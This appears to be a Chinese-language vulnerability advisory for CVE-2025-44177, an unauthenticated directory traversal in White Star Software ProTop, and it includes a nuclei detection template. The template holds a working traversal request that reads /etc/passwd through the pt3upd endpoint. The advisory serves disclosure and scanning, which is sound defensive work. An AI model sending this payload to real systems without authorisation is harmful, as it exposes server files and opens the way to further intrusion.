White Star Software ProTop 目录遍历漏洞

漏洞信息

漏洞名称： White Star Software ProTop 目录遍历漏洞

漏洞编号：

• CVE： CVE-2025-44177

漏洞类型： 目录遍历

漏洞等级： 高危

漏洞描述： White Star Software ProTop是一款专业的网络管理软件，广泛应用于企业网络监控和管理中。该软件提供了一个名为pt3upd的端点，用于处理更新请求。然而，由于缺乏适当的输入验证，攻击者可以通过构造特殊的HTTP请求，利用目录遍历漏洞访问服务器上的任意文件。具体来说，攻击者可以通过发送包含’..%2f’序列的请求，绕过安全限制，读取如/etc/passwd等敏感文件。这种漏洞的存在，使得攻击者无需任何形式的认证即可执行攻击，极大地增加了系统的安全风险。攻击成功后，攻击者可以获取敏感信息，进一步利用这些信息进行更深入的攻击，如提权或横向移动。由于该漏洞可以被远程利用且无需用户交互，因此其危害性被评估为高危。建议所有使用White Star Software ProTop的用户尽快升级到4.4.2-2024-11-27之后的版本，以避免潜在的安全威胁。

产品厂商： White Star Software

产品名称： ProTop

影响版本： version <= 4.4.2-2024-11-27

来源： https://github.com/projectdiscovery/nuclei-templates/blob/1b19340044a54b423945958eacf50afea85042ca/http%2Fcves%2F2025%2FCVE-2025-44177.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-44177

info:
  name: White Star Software ProTop - Directory Traversal
  author: s-cu-bot
  severity: high
  description: |
    This vulnerability allows unauthenticated directory traversal via the pt3upd endpoint.
  remediation: |
    Upgrade White Star Software ProTop to a version after v4.4.2-2024-11-27.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-44177
    - https://client.protop.co.za/
    - https://wss.com/
    - https://gist.github.com/stSLAYER/4a2ecfbab1215a0be0dde59c4ac0122d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2025-44177
    cwe-id: CWE-22
    cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: white star software
    product: protop
  tags: cve2025,lfi,traversal,protop

http:
  - raw:
      - |
        GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: regex
        name: LFI
        regex:
          - "root:.*:0:0:"